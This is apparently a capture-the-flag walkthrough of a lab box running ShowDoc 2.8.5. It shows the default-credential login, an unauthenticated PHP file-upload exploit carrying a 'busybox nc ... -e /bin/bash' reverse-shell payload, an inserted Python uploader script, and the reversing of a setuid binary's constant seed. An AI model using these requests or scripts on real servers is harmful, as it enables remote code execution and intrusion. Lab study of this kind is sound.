show (target machine)

📅 2026/7/2 3:28:32
Scanning

```
┌──(root㉿kali)-[/home/kali1]
└─# nmap -A 172.26.17.179
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-26 14:39 CST
Nmap scan report for 172.26.17.179
Host is up (0.0032s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 10.0p2 Debian 7+deb13u1 (protocol 2.0)
80/tcp  open     http    Apache httpd 2.4.66 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/
| http-title: ShowDoc
|_Requested resource was ./web/#/
|_http-server-header: Apache/2.4.66 (Debian)
514/tcp filtered shell
Device type: WAP
Running: Actiontec embedded, Linux
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel
OS details: Actiontec MI424WR-GEN3I WAP
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.04 ms 192.168.245.2
2   0.04 ms 172.26.17.179

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.28 seconds
```

Putting this together: port 80 is open and the page title is ShowDoc. (Ignore the "Actiontec MI424WR-GEN3I WAP" line; that is only nmap's OS fingerprint guess, and the Debian SSH banner and Apache header are the reliable signals.) ShowDoc is a collaborative API documentation tool, something like Tencent Docs for interface docs, meant to help developers write and manage API documentation. It is aimed at projects with a separate front end and back end, giving front-end developers clean and detailed interface docs. Opening the site lands on a default page and then asks for a login, so we need credentials for this box. Honestly I had no real plan at first; the simplest thing is to search for default credentials for this kind of application. The ShowDoc deployment tutorial gives them, and they still work here: username `showdoc`, password `123456`.

After logging in there is frankly not much to look at, and you will not find a vulnerability from the UI alone. If anything, start with a dirsearch scan:

```
┌──(root㉿kali)-[/home/kali1]
└─# dirsearch -u http://172.26.17.179
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali1/reports/http_172.26.17.179/_26-06-26_14-57-19.txt

Target: http://172.26.17.179/

[14:57:19] Starting:
[14:57:20] 403 -  318B  - /.ht_wsr.txt
[14:57:20] 403 -  318B  - /.htaccess.bak1
[14:57:20] 403 -  318B  - /.htaccess.orig
[14:57:20] 403 -  318B  - /.htaccess.save
[14:57:20] 403 -  318B  - /.htaccess.sample
[14:57:20] 403 -  318B  - /.htaccess_extra
[14:57:20] 403 -  318B  - /.htaccess_sc
[14:57:20] 403 -  318B  - /.htaccess_orig
[14:57:20] 403 -  318B  - /.htaccessBAK
[14:57:20] 403 -  318B  - /.htaccessOLD
[14:57:20] 403 -  318B  - /.htaccessOLD2
[14:57:20] 403 -  318B  - /.htm
[14:57:20] 403 -  318B  - /.html
[14:57:20] 403 -  318B  - /.htpasswd_test
[14:57:20] 403 -  318B  - /.htpasswds
[14:57:20] 403 -  318B  - /.httr-oauth
[14:57:20] 403 -  318B  - /.php
[14:57:25] 404 -   16B  - /composer.phar
[14:57:25] 200 -  564B  - /composer.json
[14:57:26] 301 -  362B  - /documentation  ->  http://172.26.17.179/documentation/
[14:57:26] 200 -  486B  - /documentation/
[14:57:26] 200 -  385B  - /Dockerfile
[14:57:27] 200 -    4KB - /favicon.ico
[14:57:28] 301 -  356B  - /install  ->  http://172.26.17.179/install/
[14:57:28] 200 -  696B  - /install/
[14:57:28] 200 -  696B  - /install/index.php?upgrade/
[14:57:29] 200 -    1KB - /LICENSE.txt
[14:57:31] 404 -   16B  - /php-cs-fixer.phar
[14:57:31] 404 -   16B  - /phpunit.phar
[14:57:32] 200 -  694B  - /Public/
[14:57:32] 200 -    4KB - /README.md
[14:57:32] 200 -   30B  - /robots.txt
[14:57:33] 301 -  355B  - /server  ->  http://172.26.17.179/server/
[14:57:33] 403 -  318B  - /server-status
[14:57:33] 403 -  318B  - /server-status/
[14:57:36] 200 -  958B  - /web/

Task Completed
```

The useful hit is `composer.json`, which is world-readable and carries the ShowDoc version: v2.8.5 (`README.md`, `Dockerfile`, `LICENSE.txt` and `/install/` all answer 200 as well). With a version in hand you can search for public PoCs for it, or, since ShowDoc is open source, pull the source for that version and read it yourself.

Exploitation

https://github.com/vulhub/vulhub/tree/master/showdoc/CNVD-2020-26585

```
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0RdOKBR8AmAxfRyl
Content-Length: 213

------WebKitFormBoundary0RdOKBR8AmAxfRyl
Content-Disposition: form-data; name="editormd-image-file"; filename="test.php"
Content-Type: text/plain

<?php phpinfo();?>
------WebKitFormBoundary0RdOKBR8AmAxfRyl--
```
In short, this is a file-upload vulnerability, and the upload in question is the image upload; the root cause is a series of route filtering problems. Note that the vulhub PoC carries no Cookie header at all. The `/home/page/uploadImg` route used in the PoC cannot be reached from anything clickable in the web front end, so it must have come out of a code audit. I wondered how it was found: I really saw nothing on the front-end pages that leads there, so I went to the source. Searching `web_src` shows what the front end actually calls:

```
┌──(root㉿kali)-[/home/kali1/showdoc-2.8.6]
└─# grep -rni /api/page/uploadImg . | grep -v html
./web_src/src/components/common/Editormd.vue:105:        imageUploadURL: DocConfig.server + '/api/page/uploadImg',
./web_src/src/components/page/edit/Index.vue:501:      var url = DocConfig.server + '/api/page/uploadImg'

┌──(root㉿kali)-[/home/kali1/showdoc-2.8.6]
└─# grep -rni /home/page/uploadImg . | grep -v html
```

The front end only ever references `/api/page/uploadImg`; `/home/page/uploadImg` appears nowhere in it (though I may have missed something). The PoC goes in through ThinkPHP's `index.php?s=/home/page/uploadImg` entry point instead of the `/api/` path the front end uses, which is why you will never find it by clicking around. Against this box:

```
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 172.26.17.179
Accept: */*
Origin: http://172.26.17.179
Cookie: PHPSESSID=plv0o3ku3kvfm94b8m4gs4tv2m; think_language=zh-CN; cookie_token=68126cabb2bc16a5875aaf343f3adc83d7a84182809b7642f155010b427c63ef
Referer: http://172.26.17.179/web/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABxK2F35Zt6rFPdp
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 190

------WebKitFormBoundaryABxK2F35Zt6rFPdp
Content-Disposition: form-data; name="editormd-image-file"; filename="d.php"
Content-Type: text/plain

<?php system("busybox nc 172.26.17.163 1234 -e /bin/bash"); ?>
------WebKitFormBoundaryABxK2F35Zt6rFPdp--
```

```
HTTP/1.1 200 OK
Date: Thu, 25 Jun 2026 04:30:25 GMT
Server: Apache/2.4.66 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 92

{"url":"http:\/\/172.26.17.179\/Public\/Uploads\/2026-06-25\/6a3caee154dbc.php","success":1}
```

The server renames the file but keeps the `.php` extension, so requesting the returned URL under `/Public/Uploads/` executes the payload; with a listener waiting on 172.26.17.163:1234 (`nc -lvnp 1234`) that gives a reverse shell.
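The same upload, driven from Python's standard library, as an added example that is not code from the writeup or from vulhub. The target address, the `index.php?s=/home/page/uploadImg` route, the `editormd-image-file` field name, the boundary string and the captured response body are taken from the writeup above; the function names and the `--live` switch are this example's own. The offline part parses the captured response and checks that the stored name kept a PHP-handled extension (which is what turns an image upload into code execution); the live part only runs when asked.

```python
"""Upload a PHP file through ShowDoc's page/uploadImg action and verify the
result. Added example, not code from the writeup or from vulhub."""
import http.client
import json
import sys

# Taken from the writeup: target, entry route, form field, boundary.
TARGET_HOST = "172.26.17.179"
UPLOAD_PATH = "/index.php?s=/home/page/uploadImg"
FORM_FIELD = "editormd-image-file"
BOUNDARY = "----WebKitFormBoundaryABxK2F35Zt6rFPdp"

# Response body captured in the writeup; used for the offline check below.
CAPTURED_RESPONSE = ('{"url":"http:\\/\\/172.26.17.179\\/Public\\/Uploads\\/'
                     '2026-06-25\\/6a3caee154dbc.php","success":1}')

# Extensions Debian's Apache php module hands to the PHP interpreter.
PHP_EXTENSIONS = (".php", ".phar", ".phtml")


def build_multipart(filename, content, boundary=BOUNDARY):
    """Return the multipart/form-data body as bytes.

    Every line must end in CRLF and the closing boundary needs the trailing
    '--'; both are easy to lose when a PoC is pasted through a text editor.
    """
    parts = [
        f"--{boundary}",
        f'Content-Disposition: form-data; name="{FORM_FIELD}"; filename="{filename}"',
        "Content-Type: text/plain",
        "",
        content,
        f"--{boundary}--",
        "",
    ]
    return "\r\n".join(parts).encode()


def parse_upload_response(body):
    """Return the stored file URL on success, None if the upload was refused
    or the server answered with something that is not ShowDoc's JSON."""
    try:
        data = json.loads(body)
    except ValueError:
        return None
    if not isinstance(data, dict) or data.get("success") != 1:
        return None
    return data.get("url")


def is_executable_upload(url):
    """True if the stored name still ends in an extension PHP will execute."""
    return url is not None and url.lower().endswith(PHP_EXTENSIONS)


def upload(host, filename, content):
    """POST the file to the target and return the URL ShowDoc stored it under."""
    body = build_multipart(filename, content)
    conn = http.client.HTTPConnection(host, timeout=10)
    conn.request("POST", UPLOAD_PATH, body=body, headers={
        "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
        "Content-Length": str(len(body)),
    })
    resp = conn.getresponse()
    return parse_upload_response(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Offline: the response from the writeup parses to a .php URL.
    stored = parse_upload_response(CAPTURED_RESPONSE)
    print("captured upload stored as:", stored, "executable:", is_executable_upload(stored))
    if "--live" in sys.argv:
        # vulhub's proof payload; the writeup swapped in a busybox nc reverse shell.
        url = upload(TARGET_HOST, "d.php", "<?php phpinfo(); ?>")
        if is_executable_upload(url):
            print("stored as", url, "(request it to execute the payload)")
        else:
            print("upload rejected or extension stripped:", url)
```

Run it with no arguments to exercise the parser on the captured response; add `--live` to actually send the upload to the target.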
Once inside, finding the next step takes no special trick: the password is sitting in PHP code. In `./html/server/Application/Common/Conf/config.php` the configured password is `showdoc123456`. There are two local users, `mooi` and `l1qin9`, and both reuse that same password, but the clue is with the latter, `l1qin9`:

```
l1qin9@Show:~$ ls -al
total 60
drwx------ 3 l1qin9 l1qin9  4096 Jun 26 03:25 .
drwxr-xr-x 4 root   root    4096 Apr 25 20:07 ..
-rwsr-sr-x 1 root   root   16632 Apr 25 22:43 auth_monitor
l1qin9@Show:~$ ./auth_monitor
--- MAZE-SEC ACCESS MONITOR ---
SYSTEM_TICK: 1782458733
CHALLENGE_STAMP: f9fb2198
ENTER ACCESS CODE:
```

The home directory holds an `auth_monitor` binary that is setuid and setgid root (`-rwsr-sr-x`, owned by root); running it prints a challenge and asks for an access code. Pull it into IDA.

IDA reversing, main():

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // ebx
  time_t v4; // rax
  char s[256]; // [rsp+10h] [rbp-130h] BYREF
  int v7; // [rsp+110h] [rbp-30h] BYREF
  unsigned int buf; // [rsp+114h] [rbp-2Ch] BYREF
  FILE *stream; // [rsp+118h] [rbp-28h]
  int v10; // [rsp+120h] [rbp-20h]
  int fd; // [rsp+124h] [rbp-1Ch]
  int i; // [rsp+128h] [rbp-18h]
  unsigned int v13; // [rsp+12Ch] [rbp-14h]

  fd = open("/dev/urandom", 0, envp);          // raw seed comes from /dev/urandom
  if ( fd < 0 )
  {
    v3 = time(0LL);
    buf = v3 ^ getpid();                        // fallback seed if urandom is unavailable
  }
  else
  {
    read(fd, &buf, 4uLL);
    close(fd);
  }
  v13 = 0;
  for ( i = 0; i <= 99; ++i )                  // 100 rounds mixing the raw seed buf with argv[0][0]
  {
    v13 += buf % (i + 1);
    v13 ^= **argv;
  }
  s0rand(v13);                                  // looks like srand(): seed the PRNG so each run differs
  v10 = rand();                                 // the expected access code
  puts("--- MAZE-SEC ACCESS MONITOR ---");
  v4 = time(0LL);
  printf("SYSTEM_TICK: %ld\n", v4);
  printf("CHALLENGE_STAMP: %08x\n", buf);       // buf is printed, so at first glance replaying the
                                                // same mixing with it should yield the access code
  printf("ENTER ACCESS CODE: ");
  if ( (unsigned int)__isoc99_scanf("%d", &v7) != 1 )
    return 1;
  if ( v10 == v7 )
  {
    setuid(0);
    setgid(0);
    stream = fopen("/root/show.txt", "r");
    if ( stream )
    {
      while ( fgets(s, 256, stream) )
        printf("%s", s);
      fclose(stream);
    }
  }
  else
  {
    puts("ACCESS DENIED.");
  }
  return 0;
}
```

Now for the nastiest part of this box. If you only looked at the seed mixing above, you have only half the picture; you have to step into `s0rand()`:

```c
void s0rand()
{
  srand(0x539u);
}
```

That function never uses `v13` as the seed. It seeds with the constant `0x539u`, which is 1337 in decimal (the `u` suffix only marks the literal as unsigned). So the CHALLENGE_STAMP and the 100-round loop are decoys: `v10` is always the first `rand()` after `srand(1337)`, and the solver is simply:

```c
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    unsigned int buf = 1337;   /* the constant seed from s0rand() */
    int answer = 0;

    srand(buf);
    answer = rand();           /* same first rand() that auth_monitor keeps in v10 */
    printf("%d\n", answer);    /* decimal, which is what the binary's scanf("%d") expects */
    printf("%08x\n", answer);
    return 0;
}
```

Finally, type the decimal result at the ENTER ACCESS CODE prompt and the binary prints `/root/show.txt`. One caveat: `rand()` is libc-specific, so compile and run the solver on the target itself (or another glibc system); a different libc will produce a different number.
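The solver above depends on the attacking box having the same `rand()` as the target. The following added example, which is not code from the writeup, goes a step further: it re-implements glibc's `srand()`/`rand()` (the TYPE_3 additive feedback generator, 31-word state, separation 3, 310 discarded outputs) so the access code can be computed on any host, and it carries the binary's 100-round mixing loop alongside to make the point that its result never reaches the seed. The `0x539` seed, the `f9fb2198` stamp, the loop arithmetic and the `**argv` input are from the decompilation above; the function names are this example's own, and `argv[0][0]` is assumed to be `'.'` because the binary was run as `./auth_monitor`.

```python
"""Recompute auth_monitor's access code without depending on the attacking
machine's libc. Added example, not part of the writeup."""

GLIBC_DEG, GLIBC_SEP = 31, 3   # glibc TYPE_3 generator: r[i] = r[i-31] + r[i-3]


def _c_div(a, b):
    """Integer division with C's truncation toward zero (Python floors)."""
    q = abs(a) // abs(b)
    return q if (a < 0) == (b < 0) else -q


def glibc_rand_sequence(seed, count):
    """First `count` values glibc rand() returns after srand(seed).

    Mirrors glibc's __srandom_r/__random_r: the seed is taken as a signed
    32-bit int (0 becomes 1), expanded with the 16807 Park-Miller LCG using
    Schrage's method, and 310 outputs are discarded before the first result.
    Each returned value is the 32-bit state word shifted right by one.
    """
    word = seed & 0xFFFFFFFF
    if word >= 0x80000000:
        word -= 1 << 32
    if word == 0:
        word = 1
    r = [word]
    for _ in range(1, GLIBC_DEG):
        hi = _c_div(word, 127773)
        lo = word - hi * 127773
        word = 16807 * lo - 2836 * hi
        if word < 0:
            word += 2147483647
        r.append(word)
    for i in range(GLIBC_DEG, GLIBC_DEG + GLIBC_SEP):
        r.append(r[i - GLIBC_DEG])
    first_output = GLIBC_DEG + GLIBC_SEP + GLIBC_DEG * 10
    out = []
    for i in range(GLIBC_DEG + GLIBC_SEP, first_output + count):
        r.append((r[i - GLIBC_DEG] + r[i - GLIBC_SEP]) & 0xFFFFFFFF)
        if i >= first_output:
            out.append(r[i] >> 1)
    return out


def mix_stamp(stamp, argv0_first_byte):
    """The 100-round loop main() runs over CHALLENGE_STAMP (buf) and **argv."""
    v13 = 0
    for i in range(100):
        v13 = (v13 + stamp % (i + 1)) & 0xFFFFFFFF
        v13 ^= argv0_first_byte
    return v13


def access_code(stamp=0, argv0_first_byte=ord(".")):
    """What auth_monitor compares the typed code against.

    The mixed value is computed exactly as the binary does it and then
    discarded, because s0rand() seeds with the constant 0x539 regardless.
    """
    mix_stamp(stamp, argv0_first_byte)
    return glibc_rand_sequence(0x539, 1)[0]


if __name__ == "__main__":
    stamp = int("f9fb2198", 16)   # CHALLENGE_STAMP printed by the binary
    print("mixed (unused) seed: %08x" % mix_stamp(stamp, ord(".")))
    print("access code:", access_code(stamp))
```

`glibc_rand_sequence(1, 1)` reproduces the familiar 1804289383 that an unseeded glibc `rand()` returns, which is the quick way to confirm the re-implementation before trusting it for seed 1337; the assertion that `access_code` gives the same value for any stamp and any `argv[0]` is the decoy check in code form.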